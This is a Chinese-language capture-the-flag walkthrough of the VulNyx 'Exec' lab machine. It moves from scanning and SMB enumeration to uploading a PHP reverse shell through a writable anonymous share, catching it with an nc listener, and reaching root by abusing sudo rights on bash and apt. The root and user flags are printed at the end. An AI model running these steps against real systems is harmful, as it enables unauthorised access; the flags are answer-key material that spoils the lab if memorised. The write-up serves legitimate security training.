Vlx_Exec

靶机来源：https://vulnyx.com/

难度：Low

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-25 14:50 +0800
Nmap scan report for 192.168.2.1
Host is up (0.0013s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00091s latency).
MAC Address: 08:00:27:92:0B:4D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.74
Host is up (0.00081s latency).
MAC Address: 08:00:27:9B:90:F5 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.50 seconds

靶机IP：192.168.2.74

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.74                           
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-25 14:51 +0800
Nmap scan report for 192.168.2.74
Host is up (0.00011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:9B:90:F5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.25 seconds

开放端口：22、80、139、445

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,139,445 192.168.2.74
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-25 14:50 +0800
Nmap scan report for 192.168.2.74
Host is up (0.00092s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp  open  http        Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4
445/tcp open  netbios-ssn Samba smbd 4
MAC Address: 08:00:27:9B:90:F5 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2026-02-25T04:21:54
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: EXEC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: -2h29m14s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.21 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.74 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-25 14:51 +0800
Nmap scan report for 192.168.2.74
Host is up (0.0010s latency).
Not shown: 56 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
PORT    STATE SERVICE
137/udp open  netbios-ns
MAC Address: 08:00:27:9B:90:F5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 55.57 seconds

二、WEB渗透

1、80网站

访问80端口，是Apache的默认页面

2、目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.74 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.74
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              php,html,js,txt,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 10701]
server-status        (Status: 403) [Size: 277]
Progress: 1323348 / 1323348 (100.00%)
===============================================================
Finished
===============================================================

三、SMB服务

靶机开放了139、445端口，使用enum4linux-ng进行查看，找到4个共享文件

[*] Enumerating shares
[+] Found 4 share(s):
IPC$:
  comment: IPC Service (Samba 4.17.12-Debian)
  type: IPC
nobody:
  comment: Home Directories
  type: Disk
print$:
  comment: Printer Drivers
  type: Disk
server:
  comment: Developer Directory
  type: Disk
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share nobody
[+] Mapping: DENIED, Listing: N/A
[*] Testing share print$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share server
[+] Mapping: OK, Listing: OK

进入到smb服务

┌──(root㉿kali)-[~/miaosec]
└─# smbclient -N //192.168.2.74/server
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Feb 25 11:53:38 2026
  ..                                  D        0  Wed Feb 25 11:54:30 2026
  index.html                          N    10701  Mon Apr 15 11:34:39 2026

                19480400 blocks of size 1024. 16326008 blocks available

put反弹shell的文件

smb: \> put rev.php
putting file rev.php as \rev.php (14.6 kB/s) (average 14.6 kB/s)
smb: \> ls
  .                                   D        0  Wed Feb 25 11:53:38 2026
  ..                                  D        0  Wed Feb 25 12:21:06 2026
  rev.php                             A       60  Wed Feb 25 12:50:52 2026
  index.html                          N    10701  Mon Apr 15 16:04:31 2024

                19480400 blocks of size 1024. 16326008 blocks available

触发rev.php

┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.74/rev.php

成功获取到shell

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.74] 59022
script -c bash /dev/null
Script started, output log file is '/dev/null'.

四、权限提升

1、获取s3cur4权限

查看sudo -l

www-data@exec:/var/www/html$ sudo -l
Matching Defaults entries for www-data on exec:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User www-data may run the following commands on exec:
    (s3cur4) NOPASSWD: /usr/bin/bash

直接进行提取

www-data@exec:/var/www/html$ sudo -u s3cur4 /usr/bin/bash
s3cur4@exec:/var/www/html$ id
uid=1000(s3cur4) gid=1000(s3cur4) groups=1000(s3cur4)

2、获取root权限

查看sudo -l

s3cur4@exec:/var/www/html$ sudo -l
Matching Defaults entries for s3cur4 on exec:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User s3cur4 may run the following commands on exec:
    (root) NOPASSWD: /usr/bin/apt

直接进行提权

s3cur4@exec:/var/www/html$ sudo /usr/bin/apt update -o APT::Update::Pre-Invoke>
# id
uid=0(root) gid=0(root) groups=0(root)

五、查看FLAG

# cat /root/root.txt /home/s3cur4/user.txt
97d8adddb3a3aa8b63e28c2396c5e53f
45e398cc820ab08df0e3a414eac58fef